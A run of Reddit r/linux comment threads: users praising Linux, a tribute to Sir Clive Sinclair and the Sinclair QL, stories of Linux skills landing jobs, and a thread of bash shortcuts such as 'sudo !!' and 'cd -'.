Then I discover something about VM. I have learned more about computers and software in 2 months of use in Linux than 10 years of use from Windows OS. Probably helped that I use a rolling-release distro that sometimes may bring headache; nothing a live USB reinstall and/or Timeshift backup can't fix.
We all feel it too, best computer sensation ever.

 people thinks computers are problematic, they aren't ,Windows is
this is a beautiful post
As cheesy as this might be, I 100% agree.
windows gives u no /home
[deleted]
Go outside
This is one of the most true statements I have seen in a while
More like being at /home, amirite?


What's that?  The exit's this way? Okay, I'll see myself out.
I hope it can be like home for me someday, maybe if creative pro apps, mostly audio comes to it.  I'd love to not worry about dpc latency for example.
This is beautiful. Great read. Thank you. :)
OMG What amazing literature. Next time I'm trying to convince someone to use linux, I quote this.
Fam I feel you UwU
As a Windows + GNU/Linux user I have to say that GNU/Linux is really good and better for a lot of stuff: way better user interface, it doesn't try to enforce stuff on me (do you want to change browser?), it is open, free, customizable etc.
Unfortunately I have some problem with it or use case that still requires Windows for best user experience, so I start my pc and select the os based on what I have to do in that moment.
its the feeling of being able to control what the system actually does, the feeling of unlimited customizability and great ressource management under linux i like, hell even microsoft knows it, they just cant replicate it properly, and the developers (or most of them) are just too lazy to cater to such a "niche" community.
What does it for me is that I can tailor the experience to the workflow that I want and like.

I'm too slow when I'm developing on Windows.  There's no decent tiling options and it's just not as easy to move around the system and do things without having to stop and use a mouse.

I finally got around to setting up cross-compiling so I don't have to boot into Windows for making Windows builds anymore.  Only need it for gaming still.
Just got a new prebuilt rig and put linux and actually feel like I own it.
Very well said
You make a man want to get up and move! ;-)
Andrew Camarata is that you?
so much DIY to do that I have never time to watch TV
I enjoy snowy or rainy days where I can slap into my PJs and hope into Linux. Always a joy.
I'm one of those nutjobs that has Windows, Linux and MacOS running on three systems in my office and I love them all like they're three weird children and I'm a weird dad.
Foe me , linux is like a castle and luxury residence at the same time. So lucky to jave one (for free).
I am not a Linux pro but I have been learning this for about a year and have had a lot of fun. But the only concern I have as a Linux desktop user is **hiberate**. I haven't been able to enable hiberate option in my Linux desktop like I do in **Windows**. And, that's my biggest concern for not switching to Linux desktop completely.

Because I use the Windows hibernate feature quite often.
[Every time I remote into someone's Windows 10 machine from my glorious Linux box.](https://i.kym-cdn.com/entries/icons/facebook/000/028/154/Screen_Shot_2019-01-14_at_1.23.53_PM.jpg)
same here. I primarily use macOS at work and Arch Linux at home with a lot of mixed OSs during work from Windows Server to others. But when I'm home and boot my arch linux, it feels 100% right. Second my favourite is macOS and Windows OSs are in the trash
~/
One truly enjoys the experience and reaps its most precious benefits when child-like curiosity and open-mindedness are always present. All the necessary tools and educational opportunities can be found on both Linux and BSD, so you have made a wonderful choice. 

It's also worth mentioning that there is enough space for intellectual stimulation and other sorts of mental gymnastics. You have all the freedom available not only to absorb knowledge, but to also create your own unique pattern designs.

Enjoy the adventure!
As per a recent report, Microsoft found that nearly millions of people in Asia use pirated Windows (7, 8,10). And they are happy about it without assessing security issues. They are vulnerable to cyber attacks. Maybe they don't know about Linux, properly.

Since I came to know about Linux couple of years ago, I am in love with it. I have two variants of Linux on my dual core PC. And they are so comfortable to use.
I've been using Linux since beta 0.97sumthing ...

It's awesome.

I can control MY data and use it the way I like - it's truly free.
This same person : PopOS!, binary drivers for GPU, Networking and firmware.
Oooh yeees. I feel you.
[deleted]
I started running Linux Mint 2 years ago, oh joy of joys... best thing I ever did
I really can't agree more. Every time I fire up Windows, I feel more and more alienated from using my machine. Only reason I'm hanging on is Nvidia's SLI profiles... Next time I won't be doing SLI, needless to say.
Good point, but I just like PC gaming better.
Very true, Linux provides a wide array of options with optimal performance and user customization. Something hindered by the corporate greed of the Windows OS and its basic framework.
If I have windows 10 on my current pc can I switch to Linux? Sorry for the noob question, the way y'all talk about Linux makes me wanna try it. Would it be a bad idea if I know nothing of coding? Would definitely be willing to learn though. Thanks
[deleted]
What is best  version of linux for begginer?
There's no landlord pushing changes down your throat!
[deleted]
Yes, that’s exactly it! I’m forcing myself to use Windows at the moment, because of work (and Cyberpunk 2077), but it’s simply no fun. Working  on Windows feels like a chore, my computer like an alien, inscrutable thing that’s continuously trying to make me work the way it wants, not the way I want. It just feels like something that‘s not entirely on my side. Booting Linux with one of my favorite DEs on the other hand? Feels like a comfy, well-loved garment.
-Being able to fix what I need to.
-Responsible for the level of security I choose.
-Knowing whatever changes need to be made to best fit my use, there will be 'some' way of doing so, no matter how convoluted...
-Not worrying if I need to ask someone else if what I'm doing is allowed.
It's true. Using Windows or especially Mac OS feels like renting. You don't really know how everything works and fits togethers. It's a black box which allows you to do certain things. It's not really *yours*.
It really does, I have old junk cluttered all around the home, and old junk cluttered all around ~.
Linux is like being home with random legos thrown across the ground, and a weird smell that you dont know where it is coming from and you just have to live with it.
bro its just an os
Linux is a tool. 

Don't make love to a chainsaw, kinda cringe.
I mean I feel the same about older windows like xp and 7
I actually feel happier working for the things which make my home: my house, the furniture, everything.  Free?  Nothing is free.  There's nothing like the sense of satisfaction from working hard to obtain the things you want.  Free?  Not so much.
To be fair, a BSD user probably has the same feeling. In an open Unix system feeling more than a Linux specific one. Using an open Unix system is like a sea of Lego were you can pick and choice what parts you want. Only every part you could make your own spin of. As the package management, with build dependencies included, it's made ease to spin your own if you need to. The power and freedom of it is amazing really.
Sir Clive was a character and a visionary. A member of MENSA he developed the first digital pocket calculators, watches and portable TVs. He became famous for bringing an era of cheap computers to every home with his ZX80 & 81 and the eponymous ZX Spectrum. He later went up markets and tried to make a business machine called the Sinclair QL , or Quantum Leap.

What you might not know, though, is Linus first learned to program on a Sinclair QL and in fact inspired him to think of multitasking and doing things himself. 

So with the passing of this larger than life character we should give thanks to his inspiration, not only to 1000's of bedroom programmers who would kickstart the computer games industry and some are still riding high in it now, but also to the serious programmers like Linus, who, if he did not have a QL itch to scratch  might never have written Linux at all. 

RIP Uncle Clive. Your legacy is evident. 

[Linus Interview](https://www.youtube.com/watch?v=05pgVwzAZ6k)

[Demo 1](https://www.youtube.com/watch?v=pxx6brHlwJI)

[Demo 2](https://www.youtube.com/watch?v=MuS5qxhGA7Y)

[Linux Full Talk](https://www.youtube.com/watch?v=MShbP3OpASA)

[Sir Clive's Obituary](https://www.thetimes.co.uk/article/sir-clive-sinclair-obituary-jjgjq296k)
"Linus would not have learned how to program..."

Well, just to make a quick annoyingly pedantic tangent note: 

I strongly suspect, were it not for the Sinclair QL, Linus would have almost certainly still been passionate/driven to learn programming on another computing platform instead! 

The late 1970's to early 1980's was an insanely fun (and times bewildering) wild west of so many different computing platforms and new cheap home computers... 

So I'm confident Linus would have picked another then if the Sinclair QL wasn't created. ALTHOUGH... what effect a different platform might have had on his ultimate career focus... if any... who can say? 

I guess that's the mystery of the Butterfly Effect, when it comes to imagining alternate timelines! 

--------------------------------

Anyways... all that said... getting back to the far more important topic: 

I utterly agree with the sentiment and acknowledgement of this post, namely the brilliance of Sir Clive Sinclair, and the fact that it was his computing-platform, out of all the possible ones, that did in fact become Linus' first machine! 

It was a great platform... sort of the great-grandfather to the Raspberry Pie I would say, in many ways... but even more groundbreaking in other ways, as this was very new territory back then.
I didn't start my computing career on a Sinclair machine but I did get a ZX81. How many careers were launched on a Spectrum? The low price democratised access to computing, a theme that Linux continues to this day.

And although the [C5](https://en.wikipedia.org/wiki/Sinclair_C5) was widely mocked, it's better to say it was decades ahead of its time. The technology has since caught up. Sinclair was a true visionary.
I "caught the coding bug" on a ZX80, borrowed from a schoolmate who had upgraded to a ZX81, then convinced my Dad to buy me a BBC Micro (a product which was initially plagued by "we've got HOW many orders?!")

Many school bus arguments over 6502 vs Z80 assembler. 

Sinclair was the "nutty professor" of his generation - he and his people at Research used some everyday objects in inspired ways - didn't the C5 use a washing machine motor?
I did not know this about Linus. The ZX Spectrum holds a special place in my heart for somehow having a bunch of amazing soundtracks. RIP.

Here's the Bionic Commando one:

https://www.youtube.com/watch?v=Yi0vtSh-O-0
Thank you for everything, uncle Clive. R.I.P.
RIP uncle Clive Sinclair. I always loved him. 

I never had any of his machines. I started with a Commodore 64 and my next computer was a Amstrad CPC 6128. I always dreamt of a QL but by the time I could convince my dad to get me one, it had been a commercial failure and was not available in the market anymore. 

And that's how I didn't create Linux!
Some of the things he was ridiculed for back in the day are actual things now. The C5... we now have electric cars albeit looking like cars. The Zike... we now find ourselves dodging electric scooters everywhere.

This site has a decent overview of some of his ideas: https://www.digitiser2000.com/main-page/remembering-the-other-inventions-of-sir-clive-sinclair
I had a Sinclair when I was a kid. Can't remember which. My dad got it before I was even born. I mostly used a Commodore 64 until we got our first 386 machine.
I started on a zx80 at age 11.

Oh the joys of wobbly 16k RAM packs and cassette tape storage :)
I've got one of those folding bikes with the tiny, tiny wheels. Might take it for a spin today. Well, a lot of spins.
Thanks Sir Clive, may you rest in peace

I loved the Speccy - "my" first computer. I was 5. I borrowed the computer from a cousin. But he forgot to include a tape cassette player, so all I could do was type in short programs, which would then disappear when I turned off the computer. Kids these days will never know that struggle as almost every electronic device has some kind of persistent storage device.

\--

As to whether or not Linus would have made Linux if it wasn't for the Speccy? Well, he did - the rest is pure speculation as we can't get a definite answer for (unless you believe in the multiverse theory ;)).

I strongly believe it's kind of in our DNA to be drawn towards certain things like e.g. programming (that's even scientifically proven, isn't it?). If we didn't live in this mess of a world with weird patents and proprietary software, he'd probably have built Linux for fun and giggles (but we can't know for sure ..) . The computer is merely "just" a tool to use your creative freedom as a programmer
I had no idea of how impactful the man was regarding tech. What a giant
The exact day Linus Released 0.0.1 of Linux, 30Years on the market now....🤔🤔
it was amazing what he did made an affordable computer in Britain , we dont even bother to try anymore
RIP Sir Clive.

Even before I got my ZX-81, I had (and still have) the Radio Shack version of the Cambridge Programmable calculator.  I loved that thing!
Those early systems were so powerful for the imagination for a couple of reasons.

First was the combination of a BASIC prompt and memory mapped hardware. Any pixel on the screen was available to be manipulated right from the start.

Second was that the "OS" was in ROM, no root partition or similar to fuck up. So if the system got into a weird state it was simply a power cycle away from recovery (minus whatever you were working on at the time).

The recent years of fuzzing around with containers etc look, from a certain angle, logically equivalent to having programs stored on removable storage that gets inserted as needed.

Never mind that if one buy a computer today, it does not even come with install media for whatever software bundle comes preinstalled. We are expected to bring our own storage device and made such media ourselves.
Without sir Clive and Timex I wouldn't have build my first personal computer.

Well maybe I would have ( I built heathkit TV and shortwave radios ) Just would taken longer as early machines were expensive.
Rest in peace.
bloody loved my ZX-81.... RIP Clive....
Rest In Peace Sir. Clive.
Rest in peace legend
Rest In Power
Imagine a world without Linux.  


I mean we're probably gonna be all using some form of BSD or something
Wow great post thanks
And me and millions of others. He made home computing affordable.
RIP CS!
A Spectrum clone was the first computer I learned to code on when I was a teen. My brother and I started disassembling games to figure out how to inject cheats like infinite lives. Then we went on to build our own programs and games. I loved that little machine! RIP sir Clive.
The Timex/Sinclair was my second computer. My first was an Altair 8080 kit out of New Mexico
Clickbait works!

\---

I am sad for Sir Clive Sinclair, and my condolences are with the family.
RIP
Let's see if I get downvoted to oblivion for thinking that Clive Sinclair was a bit of a dick. Not a major one, just a bit of a dick. His major talent was selling products which in many cases were technically very clever, had dreadful quality control issues. My dad had a Sinclair amplifier which was unusable, because of random crackles which were so loud it blew his speakers. He had a Sinclair calculator which frequently crashed and had the battery life of a AA trying to power a Tesla. A Black Watch which never worked properly and was either far too fast, or far too slow (how he managed that with quartz was impressive, and I had a ZX81 which was very unreliable and had a ram pack which wobbled). I also had a Speccy which, to be fair, was great (apart from the horrible keyboard, but at the price it was liveable with). There were plenty of other decent computers available while Clive was in action. I assembled a Nascom II which was great - Z80 powered like the ZX81, but much better designed (ok, and a lot bigger) and that inspired me to design and build a Z80-based computer from scratch (designing the motherboard myself, for example).   


Oh, and that bloody stupid little car was a dumb idea executed appallingly.   


He was also a member of ur r/iamverysmart club, MENSA, and I'm not entirely sure he had appropriate respect for women.
Its not like the Sinclairs were the only computers...
Perhaps you can say it *forced* Linus to program, because it was a such a flop that there was basically zero commercial support.
probably one of the most important people in the race to watch pornography on our phones. He will be forever remembered in the technological history
Linus Torvalds would have to have been actively prevented from learning how to program by some repressive authority.
This makes me wonder if Linus has a chosen successor/apprentice for the next generation.
i think he would have learnt it anyway
Hey! So today was a great day today. I got my first job as a website technician for a small company... which i now work for. Basically all i do is maintain the website and program small snippets of HTML and Java Script.

Job aside, i spoke the my new boss, and i was delightfully surprised when he told me the reason the other 4 people at the interview didn't get the job was because.... get this.... they didn't like linux / didn't know what it was. In the interview he asked me on my opinion on Linux, and being a large amateur user (though very much lover), i expressed a general positive opinion.

To quote him "In my personal experience, people who are fond of Linux and actually know what it is tend to be much more knowledgeable programmers".

I just wanted to say on here because i feel ecstatic about it.

Edit: Wow i wasn't expecting to get so many up votes! Thank you for the awards too. I hope you all have a wonderful day!
Congrats!
[deleted]
if you are doing web dev, i seriously don't know why you would want to avoid Linux. Linux machines and VMs run over 90% of the web servers. Of course if you are doing [asp.net](https://asp.net), it would be windows only but who in the right mind nowadays would start a project off on the old [asp.net](https://asp.net) when you can do the newer .net core and .net 5, soon to be .net 6 and run them on Linux machines and dockers?
Knowledge on Linux is a skill I've found people tend to overlook. I have friends who can code better than me but put them in front of a terminal window or have them try to debug a program and they're lost.
My experience is similar to his. I would immediately be suspicious of a software engineer who wasn't familiar with Linux unless they were pretty junior.
Kudos!  It's such a [good feeling](https://i.kym-cdn.com/entries/icons/original/000/006/077/so_good.png) when you finally break into a full-time Linux job.
I have got several jobs because during interviews I mention that I have a homelab. Complete with servers, switches, VMware, etc.

It shows real interest in the field, and employer's know that people that enjoy the work will do a much better job and will be much more likely to keep up with the technology.
Using it, or not.. I can't imagine anyone in that field not knowing what linux is
Good for you!
Congrats on the job, I hope you get a lot out of it!

Knowing my way around Linux and UNIX has opened more doors for me than any individual programming language has. I would encourage anyone looking to cultivate useful skills in the software field to try and live out of a terminal as much as they possibly can for a while; the tools you learn and the ability to automate tasks via scripting that you naturally acquire when constantly interacting with a shell are a valuable asset to any team, and they'll take you far.
Grats! Unfortunately, where I live, being known as a "Linux guy", will end every chance you have for a job. Microsoft has a very tight grip on the businesses here.
Seeing LOTS of job openings that mention Linux experience as either a requirement or a definite plus. I did 3 interview in the past week for a company that makes network diagnostic tools (hardware) that run embedded Linux on their devices.
When I was looking for my 1st tech job about 15 years ago, I was asking a random techie guy how to get a job in tech and mentioned I was obsessed with Linux. He told me to walk into his boss's office, say the word "Linux" and I'd be hired on the spot. Long story short, I got the job.
Congrats!

Kind of in a similar situation atm, got an internship a few weeks ago at an e-commerce company with good future job prospects and was delighted to find out that they all run Linux (Ubuntu). Uncannily enough the PCs there all have almost the exact same setup as me at home, lol.
> people who are fond of Linux and actually know what it is tend to be much more knowledgeable programmers

Because they have to be. Necessity is the mother of invention ;)
Well done. I am always quite surprised when people do not know what Linux is.

It is a reflection of our society that people don't know what a safe reliable, open and free product is, while they are very familiar with an over priced unreliable, restrictive and inferior product.
A long long time ago I worked at a local PC repair shop. One of the guys there was a huge Android fan. This was like in the early days when the Droid just had come out. I fucking love Linux and always talked about it, him and I got into a good discussion as he disliked Linux, until I pointed out that the phone he lived so much is a variation of Linux. Fast forward about 8 maybe 9 years and I'm at the state fair walking around and I run into him and he and I start taking about how life's been. He starts thanking me and mentioning that because of my love of Linux and always taking about it he started playing with it, he was now a Linux system admin making a nice high salary. It was awesome.
Congratulations!
My uncle works in the tech/IT industry, and whenever we get to talking it's always some crazy technical stuff that we fling at each other. He's said that if I keep up with my Linux and computer love, I could easily mold a career out of it. Good on you for getting that job man! I so want to work in the tec industry someday, but for now school is my only calling.
Amazing story! Reminds me a lot of my own.

I was told by one of my classmate in high school that "you'll never get a job if you don't know Windows". I wish I got to meet him again so that I could tell him that focusing on Unix-like systems (first Mac OS X, then Linux) was one of the best decisions I've made. Even just knowing how to use a bash command line has made me the resident Linux expert at some workplaces and an invaluable asset.

I worked for a while for an IT contracting company and was told by my boss that "what's so great about you is that you are genuinely interested in what you do". I silently wondered what everyone else were doing there but then remembered that I had begun studying computer science right after the dot-com bubble. Some of my colleagues had probably gambled on making millions at a hip dot-com startup and now wished they'd picked something else.

One of my assignments was at a company developing mobile games. My main task was test automation, but I quickly found a ton of other stuff to do. I had to set up and maintain the build nodes and configure the build jobs. I was also tasked with maintaining the build and version control systems. I wasn't trained in either Test Automation or Configuration Management, but I knew how to find my way around a Unix system and that made me the most qualified person at the office. Most of the programmers seemed to just know Windows, Visual Studio and C++. Similar story with their IT support guy who refused to touch the Linux servers.

You don't have to be a Linux expert. Even some familiarity goes a long way. You can look up the rest on Stack Overflow.
How the fuck anyone in the IT world doesen't know what's linux?
Congratulations on your new job! Thanks for sharing.
He isnt wrong
How could you be a programmer and not learn Linux? Lol
[deleted]
I have had something similar happen to me a number of times over my career. Congrats!!
That is fantastic! I’m going to take the exam for the CompTIA A+ in a few months. This gives me really good hope that future job interviews will go much better, since I’m a Linux amateur and I know basic command line and etc. That kind of knowledge might just be the thing that makes me stand out from other interviewees. Congrats again :)
My knowledge of Linux hasn't necessarily gotten me jobs but it sure as hell helped me define myself as a valuable asset in every team I've been in. I've been using Linux for half my life and I'm not even 30 yet.

I'm a penetration tester and our industry standard tool is a Linux distro, specifically Kali. Most other testers know how to use it but fixing, deploying and automating stuff is another ballpark entirely. That's where I'd usually come in.

Congratulations on the new job!
It often becomes a natural next step in dog fooding.

Cheers
I like Linux a lot, but don't know enough for a job and I can't code at all :(
congrats man! hope you have a good time there.

honestly, i would be very suspicious of an interviewee who doesnt even know what linux is. even if you arent a user or a fan, you should have stumbled upon linux just by googling programming stuff, downloading programs or looking for ways to do X.
Imho, I see it like him. Linux is the foundation for backends. (Even Microsoft has its own Linux distribution) 

If people don't like it, they should do something else....
What distro do you use / like?

I use
#POP 
btw
Wow, congrats!   Sounds like a wise boss.  Will they let you use a Linux desktop?

I seldom find programmers or managers that respect Linux in my area.  You are lucky to find one that does.  Often, they just see Linux as one more hurdle in the app deployment pipeline.

Now, I suggest you learn go through linuxjourney.com and learn some Bash.

I'm late in my career, so I can be picky.  I would never accept a job if I couldn't use a Linux desktop.
I LOVE linux, I just have a hard time learning it because I'm very Adhd, and reading retention is not my strong suit
Against my parents best wishes, I decided to drop out of high school after I borrowed a couple of books from a public library ("C++ for Dummies" and Ubuntu 9.10).

Turned out pretty well, and I have been working in the tech industry for the last 8 years (since the age of 16) and currently working a dream tech job.

Sadly I mostly use Mac for work now, and I'm less passionate about social/tech issues (such as FLOSS), but we still deploy everything to Linux.

I miss tweaking with Arch Linux and Mint, and even though I haven't used them in years, they will always hold a warm place in my heart.
I'm wishing so much that I spent more time learning Linux when I was younger (in my 40s now). The job market for Linux admins is crazy with amazing pay. They get offered so much in my area that they bounce around everywhere here.
Congrats!. The only reason I know and like linux is because I studied 2 I.T degrees and learnt how to operate Ubuntu(both desktop and server) and create dhcp, dns, ftp, http and audio streaming services xD. I don't use it as my daily O.S because I've always used windows and think no other OS is better than windows for gaming and daily use.
In my experience, people on Windows that remaining being ignorant about Linux systems are the worst to work with. Every time they ask me for help, they make it difficult for me, because they're limited to their GUI tools with tons of checkboxes and I can't simply drop a one-liner to immediately solve their issue. Also they tend to have very limited view on how technologies work, even though they're so called programmers. Every time I try to explain basic stuff, they're not into learning, just clicking their guis and forget the problems as soon as possible.

To me it's just like that, finding a job is pretty easy if you just show that you're able to use Linux.
I have a friend that I'm pretty sure his knowledge of linux got him his job at Red Hat.
And then there's me. Loving Linux running NixOS (it's the future, try it)

I do fulltime consulting for a company running everything exclusively on windows. It's hell

&#x200B;

edit: Congrats dude :)
Congratulation.
So, knowing more tech shit gave you better odds at a job offer?

No way! Unprecedented! /s
Take love brou.
whats the pay
Congratulations!
Congrats!
As it should!!!!
You Rock!!!
This does put a smile on my face
wtf, how can you be in web stuff and not be in to linux

poor dumb 4 guys

its so obvious they dont self host their own projects or something web related
This is really similar how I got into a senior position from intern competing with a bunch of other people applying internally. I keep telling people to learn Linux and love it that I work with it but they all think it's too much work or give up immediately. Whatever, their loss I guess.
That's it ... next time I go into an interview, I'm wearing my "Linux Rulz!" t-shirt!


Also, congratulations!
I am a linux or windows 7 guy, recently the nostalgia came back and I switched to windows 7 for a while, I'll be back to linux tho o.o
Same here!  I was picked out because I have Linux experience, and the monitoring system runs Linux.  This in a mainly Windows based shop!
Congrats!! This is quite reassuring to hear as I'm graduating from university and looking for work. Haven't had any call backs, but this is a great morale booster. Thank you.
thats awesome! congrats
Congratulations.
So you're saying that my PinePhone is basically an interview fastpass?
I like to ask people in an interview, "What OS do you prefer, and why? Do you have a favorite linux distribution if you had to use linux, and why? What do you dislike about the operating systems you have used?"

The specific answer is irrelevant, but how you answer that tells me a lot about your skills and how quickly you can learn.
Like what you do, do what you like
Cool! Congratulations!
So cool! Congrats!
"Wow i wasn't expecting to get so many up votes! Thank you for the awards too."

You do realize you posted this in /r/linux, right?

Congrats with the job!
This is super cool! Congratulations!
Congratulations... also I'm enthusiastic and guess what... based on my Linux knowledge I have been able to solve issues which in other way it would be impossible to do in my Job.  Literally Linux pays my bills :-)
Dude, that is phenomenal. Congratulations! Are you remote?
That makes me really happy to hear :D

Do you have a degree?
How do you find work for small companies? I've been looking on indeed and all I can find are mid to large size companies.
Congratulations on the job dude
Hah, this is awesome and inspiring! Congratulations!
Linux does only good
Linux master race lol
I had a similar experience interviewing for my DBA job except in my case it was my hatred for Microsoft Access.
Linux Elite is booming today, damn!! Lol

Congrats!
Congrats brother
Congrats!
Congrats!
Not really a job, but my liking of Linux has got me an "internet filter" which will completely negate my need for an antivirus. Which is great.

That aside, nice job on your job, m8. Pun intended.
...uh, your boss seems out of touch with newer junior engineers. It's not uncommon to find new software engineers that have never needed to learn Linux nowadays; I know more than a few...and they're all fine coders, really.
If you don’t like or don’t know linux hard to hire someone because dos system can come to you anytime some code you have to know
Ten years ago I became disabled. I literally used a computer just for the web and maybe a torrent or two. No background in tech. Maybe jailbreaking iPhones or whatever.

Out of boredom and the desire to tinker, I installed gentoo linux on an old iMac. After distro hopping for years, I settled on Arch. For seven years I've been using my btrfs Arch workstation with i3wm to run Debian seedboxes, play with pentesting, and run/network *lots* of containers and VMs. 

Anyway, last month I put together a resume, just to see what happens. Being a writer, the only credentials I had to list were my handful of published open source and cyber security articles and a strong hacker ethic.

Today, I was offered a job as a Linux Support Engineer with a web hosting company. No degree. No fancy certs. Just a passion fo hacking and a near neurodivergent commitment to open source. Job is 100% remote and more salary than I've ever reasonably believed I'd be getting. Good bye Social Security.  Hello world.
Congrats & good luck
"no technical background"
Proceeds to install Gentoo and talk about some stuff that I have not the slightest idea about. 😂
Congratulations!!! Good for you for not losing hope.
And there you go. It pays to have a hobby that can actually translate to real world skills. You're basically gaining valuable experience for free. This is why a lot of people run cheap homelabs. It's a really nice way to move onto being a network engineer or similar. And people have to start somewhere, and showcase that they have passion in what they do.
Nice. Congrats.
Web hosting companies are very often the place where many people start their linux admin careers.  You don't need super tons of experience or a degree.  Learn as much as you can from your coworkers, and move on when you're ready.   You'll be ready faster than you think too.
Incredible story to hear  
Big congratulations on your success
This was the best news of the day. Gongratulations!
Congratulations. You got this!
Maybe after this stint you could move into cyber security, I hear the salary is quite nice too
Bravo! Passion drives me to mess up my OS system ~once a year.
Congratulations and all the best for the future!

The Linux and Internet have to be the most open places out there, nobody cares if you are a man, a woman, in a wheelchair, or a cat... really cool to be in it
Congrats. A great story!
Congrats!
> Hello world.

Goddamn; that hit me right in the feels.  Happy for you, OP!
First off, congratulations!

Second, I'm not even a little bit surprised.

I would have definitely argued for hiring you if I ever interviewed someone like you.

In part because to some extent, that was me, but also because your experience there is worth a _lot_.

Yeah, okay, you've never done it for money...  You still almost certainly know more about what you're working with than the people who have been getting paid for it for years.

And you're not going to stop learning about it either.
Awesome! Kudos to you!
Congrats, keep up your curiosity and tinkering spirit to grow further.
Amazing! Good luck!
Amazing!
Very happy for you! I hope it’ll be a great experience, and you’ll get even better positions in the future
Congratulations! And don't forget to pat yourself on the back, this is the result of staying strong in the face of adversity, keep it up!
Congratulations!
Congratulations
Congratulations! I'm happy that you didn't let your disability hold you back either. That's great news.
Very nice, have a great weekend :)
Great! Keep it up ma guy
That's good - computers as universal toolboox extend opportunities.
Congratulations!
Congrats!!
Congratulations and good luck.
This gives me hope, well done guy, congratulations
Fucking legend, good luck with that job! Hope you enjoy it!
This is my man!
This is amazing, congrats and good luck
I have 2 degrees (Sci/Eng) , a PhD and had to retrain in IT. (Advanced Diploma) before being able to get semi reliable work (20 years past).

I don't need any more pieces of paper.

The qualifications are just evidence.

The knowledge is the thing. The capability is the thing. 

Demonstrating that capability is what should be the entry criteria.

Ability to learn is a capability. An important underrated one.

People get hung up on this shit way too much for no good reason.
r/linuxmasterrace waits for you.

Congrats! Have a good one.
Congratulations!
“a near neurodivergent commitment”

as a neurodivergent person this gives me hope that i might actually be able to find a job if i ever muster the motivation to go work for someone else
Stranger I am highfiving the human shit out of you right now! Congratulations and goddamn well deserved!
Congratulations!!! You clearly worked hard for it and deserve it.
>a job as a Linux Support Engineer

i'm very new to the linux community (so new that i still haven't installed linux on my actual computer, just on a VM) and i didn't know such a thing existed

&#x200B;

it's a nice incentive for me to keep learning haha
Wowwww!!! I’m so happy for you :) 

Congratulations man :)
Congrats 👏 the best is yet to come!
May I see your CV?
chapéu!
> Hello world.

I love what you did here. Congratz on your job, may fortunate winds favor your sails.
Excellent! Well done, fully deserved.
I've worked in tech for a long time, it does vary from place to place and being able to answer technical questions the way the interviewers expect (they might not be technically knowledgeable themselves and only going off script) is key at a lot of places. 

That being said, having a degree and certifications as requirements, or desired qualifications is usually used to help weed people out, having them isn't necessary if you can really sell that you know the stuff they are looking to hire for. Having them will help you get noticed and moved up in line, however they're usually never the end all be all of getting a job in tech.

If you can craft a resume that grabs their attention, and mentions the right key words that suit the position or even just technologies that they use in other parts of the department or compay, it's enough to get you to that video call interview. Then you have to be able to talk about the tech to a certain depth, and issues you've ran into, and how you went about solving those issues. If the interviewers have experience with the tech, they'll recognize that you're truthful and will be better able to gauge your experience and knowledge level. If they haven't and aren't technical, you'll seem to know a lot and seem very knowledgeable, but they won't know how to gauge it. They'll probably just check the box and judge you more on qualifications like degrees, certs, and your ability to look nice and be personable during the interview process.
I'm glad for you that you managed to land a job, and nice creative use of 'hello world', BTW.

I also happen to be in a similar situation that you were in, except that I'm diagnosed with mild autism, and graduated with a bachelor's degree in computer science in September 2020, during the peak of the COVID-19 pandemic. Like you, I only have side projects as my primary source of professional experience, but I feel that that isn't enough in my job search, or maybe I'm considered an excess graduate. However, I also happen to love video games, so many of my side projects involve them. I have been using Linux distros since 2011, and have a decent amount of programming knowledge, including C++, Python, Java, and smaller bits of HTML, CSS, and JavaScript.

If you're willing to, maybe you can give some advice to me on how I should go about my future job searching? I can give more info by DM if you need it.
Well done mate! :)
That's good news, gives hope to the rest of us with no CS/IT degrees.
C Ongratz mate, good luck!
*Nothing* beats passion, congrats friend!
Bravo!
Yeah
Congratulations!
Nice touch with the "Hello world.", grats!
Excellent story
Congrats!! This is a great and inspirational story, I hope it will motivate someone else.
Congratulations! This gives me so much motivation. I to am also on the high end of the spectrum and have ADD and social anxiety issues to the point it’s hard for me to cope with the public. Being 26 and not being able to hold a public job really does blow and hurts my outlook on life. Hopefully I can somehow/someday find my way and fix my life. It just seems like so much going on. Also my father having stage 4 cancer is always on my mind. I’m happy for you friend! Thank you for your inspirational post!
Yea I build my computers and try to be current with the latest tech but a chunk of this was gibberish lol. Probably because I still don't understand Linux.
What does a Linux Support Engineer do?
congrats, i hope that it's a wonderful opportunity for you!
[deleted]
Congratulations man, you've earned that!!
Awesome. Don't demean your skills. That gentoo install is a monster and impressive. I played around with putting something on the lampshade iMac. Wishing you good luck.
Oh man, it's great and satisfying to know that someone is doing well even if you don't know them. 

Congratulations and success.
Ait mate, well done!!    
A colleague of mine said that he can teach everyone to hack but no one can teach passion.     
And if your passion shows, people will see that you are a high potential at least.   I am genuinely happy for you. 
Hello world
Nice, ... maybe also mention over on r/ITCarrerQuestions as a success story.

Get semi-recurrently folks there that moan about don't have degree, certs, work experience, can't get that IT job ... blah, blah, blah.  Uh, it is possible, ... very possible, ... sometimes they need more examples of, e.g. how, what it takes, success stories, etc. (those do also show up there, at least on occasion).
Congrats dude. That is awesome!!! :)
Congrats!!
Congratulations bro and good luck 🎉
Congratulations 🎉👏👏
Congratulations!!!!
Nice job bro, stay in sharp
i started on slackware but for me that was easy to learn i went from that to debian then to the other debian children like kali and ubuntu cyborg hawk kodachi etc
Awesome, congratulations mate.
> the only credentials I had to list were my handful of published open source and cyber security articles

Would you mind showing this "portfolio"?
[deleted]
I recently took up a teaching job and demonstrated to a class how to setup a security module. I forgot that I was in a user account and when I ran a command it gave out the permission denied message.

I typed "sudo !!" which runs the previous command as root. They were all like, woah! what was that command you did? They've all used Linux before and were quite familiar with it but they were just so amazed that they had not known about that simple command.

I spoke to some other IT teachers afterwards and they too had not known about this command. At this point I was quite surprised. So I thought I'd post here to let you all know about it, in case you weren't aware.

&#x200B;

EDIT: To clear up any confusion as noted by u/bjrn: The '!!' element is used to refer to the previous command. It can be used in conjunction with anything really. It just saves you typing out the last command. The 'sudo' part is logically placing 'sudo' before '!!' which is the previous command.
"!!" is an event designator implemented in the shell (at least bash and zsh) that refers to the previous command. It is more correct to say that, to not confuse people that it's part of the sudo program.
My favorite one is `cd -` to go to the previous directory.
Ctrl+r allows you to search previous commands, too. It’s pretty nifty when the command you wanna run is 2+ commands back.
    # please is a "sudo !!" alias
    alias please='sudo $(fc -ln -1)'

you're welcome :>
If you run cd with no command arguments it brings you back to the home directory of whatever account your logged in as
I used the "fuck" command before I found out about sudo !!. It's more or less the same thing but it can also detect other errors in the previous command. I just liked the fact I could simply write "fuck" and fix something.
There are several ! options.

One I use more than !! is !$, which is the last argument of the last command.

